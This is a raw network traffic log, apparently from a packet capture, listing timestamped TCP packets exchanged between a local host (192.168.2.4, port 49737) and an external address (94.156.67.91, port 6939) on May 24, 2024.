May 24, 2024 05:09:49.213601112 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.213685036 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.213803053 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.213846922 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.214150906 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.216862917 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.216907978 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.217051029 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.218929052 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.219082117 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.219089031 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.219161987 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.219202995 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.221591949 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.221610069 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.221653938 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.221771955 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.221793890 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.221811056 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.221832991 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.221940041 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.221992970 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.223648071 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.223666906 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.223727942 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.226466894 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.226536036 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.226679087 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.226696968 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.226744890 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.226744890 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.226799965 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.228419065 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.228463888 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.231024027 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.231121063 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.231232882 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.231250048 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.231273890 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.231400013 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.231432915 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.233175039 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.233231068 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.240742922 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.240760088 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.240813017 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.240843058 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.240858078 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.240947962 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.241195917 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.241256952 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.241314888 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.241501093 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.241509914 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.241518974 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.241553068 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.245501995 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.245512009 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.245671988 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.249537945 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.249598026 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.249643087 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.249718904 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.249764919 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.249771118 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.249782085 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.249838114 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.250132084 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.250267982 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.250328064 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.250389099 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.250520945 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.250538111 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.250778913 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.252651930 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.252711058 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.252772093 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.252870083 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.252885103 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.252912998 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.255244017 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.255292892 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.256592989 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.256675005 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.256838083 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.256849051 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.256865025 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.256930113 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.260016918 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.260476112 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.260528088 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.260556936 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.260668993 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.260720015 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.260808945 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.263979912 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.264045000 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.264053106 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.264187098 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.264203072 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.264220953 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.264228106 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.264265060 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.264740944 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.267508984 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.267555952 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.267594099 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.269471884 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.269654989 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.290441990 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.290505886 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.290695906 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.290723085 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.290831089 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.290841103 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.290890932 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.295185089 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.295341015 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.298326015 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.298403025 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.298544884 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.298554897 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.298563957 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.298608065 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.298608065 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.298923016 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.299029112 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.299060106 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.299170017 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.299179077 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.299186945 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.299212933 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.299232006 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.299408913 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.299681902 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.299726009 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.299772024 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.299921036 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.299931049 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.299962997 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.300185919 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.300194979 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.300230026 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.300400019 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.300441027 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.300678015 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.301424980 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.301467896 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.302386999 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.303359032 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.303368092 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.303426027 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.306566954 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.306576967 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.306612968 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.309324026 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.309334040 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.309341908 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.309453011 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.309453011 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.312139988 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.312150002 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.312231064 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.312807083 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.312817097 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.312824965 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.312834024 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.312864065 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.312901020 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.313682079 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.313692093 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.313699961 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.313708067 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.313744068 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.313744068 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.314501047 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.314512014 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.314519882 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.314558983 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.315287113 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.315296888 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.315305948 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.315315008 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.315336943 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.315370083 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.316117048 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.316127062 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.316134930 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.316169977 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.316169977 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.316926956 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.316936970 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.316945076 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.316953897 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.316978931 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.317011118 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.317754030 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.317764044 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.317771912 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.317780018 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.317789078 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.317800045 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.317828894 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.318535089 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.318545103 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.318552971 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.318587065 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.318587065 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.319375992 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.319386005 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.319394112 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.319430113 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.319920063 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.319961071 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.320152044 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.320389986 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.320442915 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.320703030 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.320712090 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.320758104 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.324135065 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.324145079 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.324191093 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.324994087 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.325150013 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.325309038 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.325448990 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.325459003 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.325463057 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.325572014 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.328902006 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.328912973 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.328960896 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.333856106 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.333909035 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.333982944 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.334270000 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.334280014 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.334287882 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.334321976 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.334322929 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.335053921 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.338002920 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.338011980 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.338059902 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.338156939 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.338208914 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.338447094 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.338458061 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.338466883 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.338500023 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.339237928 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.339287043 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.339478970 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.345448971 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.345509052 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.345578909 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.345855951 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.345904112 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.346153975 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.346163988 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.346173048 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.346183062 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.346213102 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.346244097 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.349119902 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.349280119 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.349289894 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.349329948 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.349520922 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.349564075 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.349854946 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.349865913 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.349874973 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.349883080 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.349904060 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.349934101 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.350610018 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.352826118 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.352900982 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.352926970 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.353163004 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.353172064 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.353179932 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.353219032 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.353219032 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.353565931 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.353790998 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.353835106 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.355377913 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.379412889 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.379461050 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.379591942 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.379700899 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.379755974 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.380026102 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.380036116 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.380043983 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.380089998 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.384228945 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.384239912 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.384428978 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.387053967 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.387171030 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.387243986 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.387387037 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.387567997 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.387588024 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.387598038 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.387649059 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.387808084 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.387818098 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.387870073 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.388237953 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.388250113 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.388283968 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.388467073 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.388678074 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.388722897 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.388904095 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.388912916 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.388952971 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.389378071 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.389389038 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.389396906 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.389406919 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.389425993 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.389445066 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.389981031 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.390206099 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.390244961 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.390441895 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.390450954 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.390460014 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.390484095 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.391079903 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.391129971 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.391410112 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.391419888 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.391427994 CEST	6939	49737	94.156.67.91	192.168.2.4
